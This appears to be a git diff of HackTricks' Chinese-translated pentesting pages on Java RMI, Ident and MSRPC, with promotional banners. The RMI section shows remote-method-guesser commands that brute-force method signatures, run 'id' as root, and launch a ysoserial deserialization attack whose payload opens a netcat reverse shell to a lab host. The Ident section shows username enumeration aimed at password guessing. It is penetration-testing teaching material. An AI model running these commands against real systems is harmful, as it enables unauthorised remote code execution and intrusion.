<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[**NFTs**]收藏品,[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

106
network-services-pentesting/1099-pentesting-java-rmi.md
View file

@ -1,30 +1,31 @@
# 1098/1099/1050 - 渗透测试 Java RMI - RMI-IIOP
# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
## 基本信息
_Java 远程方法调用__Java RMI_,是一种面向对象的 _RPC_ 机制,允许一个位于一个 _Java 虚拟机_中的对象调用另一个 _Java 虚拟机_中的对象的方法。这使开发人员能够使用面向对象的范式编写分布式应用程序。可以在[此黑帽大会演讲](https://youtu.be/t\_aw1mDNhzI?t=202)中找到从攻击者角度的 _Java RMI_ 简短介绍
_Java 远程方法调用__Java RMI_,是一种面向对象的 _RPC_ 机制,允许位于一个 _Java 虚拟机_ 中的对象调用位于另一个 _Java 虚拟机_ 中的对象的方法。这使开发人员能够使用面向对象的范式编写分布式应用程序。关于 _Java RMI_ 的简要介绍可以在 [这场黑帽会议演讲](https://youtu.be/t\_aw1mDNhzI?t=202) 中找到
**默认端口:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
```
@ -34,20 +35,20 @@ PORT STATE SERVICE VERSION
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
```
通常,只有默认的_Java RMI_组件_RMI Registry_和_Activation System_绑定到常见端口。实现实际_RMI_应用程序的_远程对象_通常绑定到随机端口如上所示的输出
通常,只有默认的 _Java RMI_ 组件_RMI Registry_ 和 _Activation System_)绑定到常见端口。实现实际 _RMI_ 应用程序的 _remote objects_ 通常绑定到随机端口,如上面的输出所示
_nmap_有时在识别受_SSL_保护的_RMI_服务时遇到问题。如果在常见_RMI_端口上遇到未知的ssl服务应进一步调查。
_nmap_ 有时在识别受 _SSL_ 保护的 _RMI_ 服务时遇到问题。如果在常见_RMI_ 端口上遇到未知的 ssl 服务,进一步调查。
## RMI组件
## RMI 组件
简单来说_Java RMI_允许开发人员在网络上提供一个_Java对象_。这会打开一个_TCP_端口,客户端可以连接并调用相应对象的方法。尽管听起来很简单但_Java RMI_需要解决几个挑战
简单来说_Java RMI_ 允许开发者在网络上提供一个 _Java object_。这打开了一个 _TCP_ 端口,客户端可以连接并调用相应对象的方法。尽管听起来很简单,但 _Java RMI_ 需要解决几个挑战:
1. 通过_Java RMI_分派方法调用客户端需要知道IP地址、监听端口、实现的类或接口以及目标对象的`ObjID``ObjID`是在对象在网络上可用时创建的唯一随机标识符。这是必需的因为_Java RMI_允许多个对象在同一个_TCP_端口上监听)。
2. 远程客户端可能通过调用暴露对象上的方法在服务器上分配资源。_Java虚拟机_需要跟踪这些资源中哪些仍在使用哪些可以进行垃圾回收。
1. 要通过 _Java RMI_ 调度方法调用,客户端需要知道目标对象的 IP 地址、监听端口、实现的类或接口以及 `ObjID``ObjID` 是在对象可用于网络时创建的唯一且随机的标识符。它是必需的,因为 _Java RMI_ 允许多个对象在同一 _TCP_ 端口上监听)。
2. 远程客户端可以通过调用暴露对象的方法在服务器上分配资源。_Java 虚拟机_ 需要跟踪这些资源中哪些仍在使用,哪些可以被垃圾回收。
第一个挑战由_RMI注册表_解决它基本上是_Java RMI_的命名服务。_RMI注册表_本身也是一个_RMI服务_但实现的接口和`ObjID`是固定的并且所有_RMI_客户端都知道。这使_RMI_客户端可以通过知道相应的_TCP_端口来使用_RMI注册表
第一个挑战由 _RMI registry_ 解决,它基本上是 _Java RMI_ 的命名服务。_RMI registry_ 本身也是一个 _RMI service_,但实现的接口和 `ObjID` 是固定的,并为所有 _RMI_ 客户端所知。这允许 _RMI_ 客户端仅通过知道相应的 _TCP_ 端口来使用 _RMI_ registry
当开发人员希望使他们的_Java对象_在网络中可用时他们通常将它们绑定到_RMI注册表_。_注册表_存储了连接到对象所需的所有信息IP地址、监听端口、实现的类或接口以及`ObjID`值并使其在人类可读的名称_绑定名称_下可用。想要消费_RMI服务_的客户端向_RMI注册表_请求相应的_绑定名称_注册表返回所有连接所需的信息。因此情况基本上与普通_DNS_服务相同。以下清单显示了一个小例子
当开发者希望在网络中提供他们的 _Java objects_ 时,他们通常将其绑定到 _RMI registry_。_registry_ 存储连接到对象所需的所有信息IP 地址、监听端口、实现的类或接口和 `ObjID`并以人类可读的名称_bound name_提供。希望使用 _RMI service_ 的客户端向 _RMI registry_ 请求相应的 _bound name_,注册表返回所有连接所需的信息。因此,情况基本上与普通的 _DNS_ 服务相同。以下列表显示了一个小示例
```java
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
@ -71,19 +72,19 @@ e.printStackTrace();
}
}
```
上述提到的第二个挑战是通过**分布式垃圾收集器**_Distributed Garbage Collector__DGC_来解决的。这是另一个具有众所周知的`ObjID`值的_RMI服务_基本上每个_RMI端点_上都可以找到它。当一个_RMI客户端开始使用一个_RMI服务时它会向_DGC_发送一个信息说明相应的_远程对象_正在使用中。_DGC_然后可以跟踪引用计数并能够清理未使用的对象。
The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects.
连同已弃用的_激活系统_一起这些是_Java RMI_的三个默认组件
Together with the deprecated _Activation System_, these are the three default components of _Java RMI_:
1. _RMI注册表_`ObjID = 0`
2. _激活系统_`ObjID = 1`
3. _分布式垃圾收集器_`ObjID = 2`
1. The _RMI Registry_ (`ObjID = 0`)
2. The _Activation System_ (`ObjID = 1`)
3. The _Distributed Garbage Collector_ (`ObjID = 2`)
_Java RMI_的默认组件长期以来一直是已知的攻击向量过时的_Java_版本中存在多个漏洞。从攻击者的角度来看这些默认组件很有趣因为它们实现了已知的类/接口很容易与它们进行交互。对于自定义_RMI服务_情况则有所不同。要调用_远程对象_上的方法您需要事先知道相应的方法签名。如果不知道现有的方法签名就无法与_RMI服务_进行通信。
The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_.
## RMI枚举
## RMI Enumeration
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)是一个能够自动识别常见_RMI漏洞_的_Java RMI_漏洞扫描器。每当您识别到一个_RMI_端点时都应该尝试使用它
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 是一个 _Java RMI_ 漏洞扫描器,能够自动识别常见的 _RMI 漏洞_。每当你识别一个 _RMI_ 端点时,你应该尝试一下
```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
@ -143,9 +144,9 @@ $ rmg enum 172.17.0.2 9010
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
```
枚举操作的输出在项目的[文档页面](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)中有更详细的解释。根据结果,您应该尝试验证识别的漏洞。
枚举操作的输出在项目的[文档页面](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)中有更详细的解释。根据结果,您应该尝试验证识别的漏洞。
_remote-method-guesser_显示的`ObjID`值可用于确定服务的正常运行时间。这可能有助于识别其他漏洞:
由_remote-method-guesser_显示的`ObjID`值可以用来确定服务的正常运行时间。这可能有助于识别其他漏洞:
```
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
@ -156,11 +157,11 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
```
## 强制破解远程方法
## Bruteforcing Remote Methods
即使在枚举过程中未发现漏洞,可用的 _RMI_ 服务仍可能暴露危险函数。此外,尽管 _RMI_ 通信到 _RMI_ 默认组件受到反序列化过滤器的保护,但与自定义 _RMI_ 服务通信时,这些过滤器通常不会生效。因此,了解 _RMI_ 服务上的有效方法签名非常有价值。
即使在枚举过程中没有发现漏洞,现有的 _RMI_ 服务仍可能暴露危险功能。此外,尽管与 _RMI_ 默认组件的 _RMI_ 通信受到反序列化过滤器的保护,但与自定义 _RMI_ 服务的通信通常没有这些过滤器。因此,了解 _RMI_ 服务上的有效方法签名非常有价值
不幸的是_Java RMI_ 不支持枚举 _远程对象_ 上的方法。尽管如此,可以使用类似 [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 或 [rmiscout](https://github.com/BishopFox/rmiscout) 这样的工具来强制破解方法签名:
不幸的是_Java RMI_ 不支持枚举 _remote objects_ 上的方法。也就是说,可以使用像 [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 或 [rmiscout](https://github.com/BishopFox/rmiscout) 这样的工具来暴力破解方法签名:
```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
@ -190,12 +191,12 @@ $ rmg guess 172.17.0.2 9010
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
```
识别的方法可以这样调用:
识别的方法可以这样调用:
```
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
```
或者您可以执行类似这样的反序列化攻击:
或者你可以像这样执行反序列化攻击:
```
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
@ -220,16 +221,16 @@ uid=0(root) gid=0(root) groups=0(root)
```
更多信息可以在以下文章中找到:
- [在 JEP 290 之后攻击 Java RMI 服务](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
- [方法猜测](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [rmiscout](https://bishopfox.com/blog/rmiscout)
* [在 JEP 290 之后攻击 Java RMI 服务](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
* [方法猜测](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
除了猜测之外,您还应该在搜索引擎或 GitHub 中查找遇到的 RMI 服务的接口甚至实现。这里的绑定名称和实现类或接口的名称可能会有所帮助。
除了猜测,您还应该在搜索引擎或 _GitHub_ 上查找遇到的 _RMI_ 服务的接口或甚至实现。_bound name_ 和实现的类或接口的名称在这里可能会有所帮助。
## 已知接口
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 如果在工具的已知 RMI 服务的内部数据库中列出了类或接口,则将其标记为 `known`。在这些情况下,您可以使用 `known` 操作来获取有关相应 RMI 服务的更多信息。
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) 将类或接口标记为 `known`如果它们在工具的已知 _RMI 服务_ 的内部数据库中列出。在这些情况下,您可以使用 `known` 操作获取有关相应 _RMI 服务_ 的更多信息:
```
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
@ -292,13 +293,13 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
* `port:1099 java`
## 工具
## Tools
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
## 参考资料
## References
* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
@ -316,21 +317,22 @@ Command: rmg enum {IP} {PORT}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 轻松构建并自动化由全球**最先进**的社区工具驱动的工作流。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 轻松构建**自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

58
network-services-pentesting/113-pentesting-ident.md
View file

@ -1,33 +1,34 @@
# 113 - 渗透测试 Ident
# 113 - Pentesting Ident
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %}
## 基本信息
**Ident 协议**用于在**互联网**上将**TCP 连接**与特定用户关联起来。最初设计用于帮助**网络管理**和**安全**,它通过允许服务器在端口 113 上查询客户端来请求有关特定 TCP 连接用户的信息
**Ident 协议** 用于通过 **互联网****TCP 连接** 与特定用户关联。最初设计用于帮助 **网络管理****安全**,它通过允许服务器在 113 端口查询客户端以请求有关特定 TCP 连接用户的信息来运行
然而,由于现代隐私问题和潜在的滥用可能,其使用已减少,因为它可能无意中向未经授权的方提供用户信息。建议采取增强的安全措施,如加密连接和严格的访问控制,以减轻这些风险。
然而,由于现代隐私问题和潜在的滥用可能,其使用已减少,因为它可能无意中向未经授权的方泄露用户信息。建议采取增强的安全措施,如加密连接和严格的访问控制,以减轻这些风险。
**默认端口:**113
**默认端口:** 113
```
PORT STATE SERVICE
113/tcp open ident
@ -36,11 +37,11 @@ PORT STATE SERVICE
### **手动 - 获取用户/识别服务**
如果一台机器正在运行 ident 和 samba 服务445你通过端口 43218 连接到 samba。你可以通过以下方式获取运行 samba 服务的用户:
如果一台机器正在运行 ident 和 samba445服务并且你通过端口 43218 连接到 samba。你可以通过以下方式获取正在运行 samba 服务的用户:
![](<../.gitbook/assets/image (843).png>)
如果你连接到服务时只是按下回车键
如果你在连接到服务时直接按回车
![](<../.gitbook/assets/image (159).png>)
@ -50,7 +51,7 @@ PORT STATE SERVICE
### Nmap
默认情况下(\`-sC\`\nmap 将识别每个运行端口的每个用户:
默认情况下(\`-sC\`nmap 将识别每个运行端口的每个用户:
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
@ -67,7 +68,7 @@ PORT STATE SERVICE VERSION
```
### Ident-user-enum
[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) 是一个简单的 PERL 脚本,用于查询 ident 服务113/TCP,以确定目标系统上每个 TCP 端口上监听的进程所有者。收集到的用户名列表可用于对其他网络服务进行密码猜测攻击。可以使用 `apt install ident-user-enum` 进行安装。
[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) 是一个简单的 PERL 脚本,用于查询 ident 服务 (113/TCP),以确定目标系统上每个 TCP 端口上监听的进程所有者。收集到的用户名列表可用于对其他网络服务进行密码猜测攻击。可以通过 `apt install ident-user-enum` 安装。
```
root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
@ -87,12 +88,12 @@ identd.conf
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 轻松构建并通过全球**最先进**的社区工具**自动化工作流程**。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) 轻松构建**自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %}
## HackTricks 自动命令
## HackTricks 自动命令
```
Protocol_Name: Ident #Protocol Abbreviation if there is one.
Port_Number: 113 #Comma separated if there is more than one.
@ -111,16 +112,17 @@ Name: Enum Users
Description: Enumerate Users
Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports)
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

146
network-services-pentesting/135-pentesting-msrpc.md
View file

@ -1,51 +1,52 @@
# 135, 593 - 渗透测试 MSRPC
# 135, 593 - Pentesting MSRPC
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
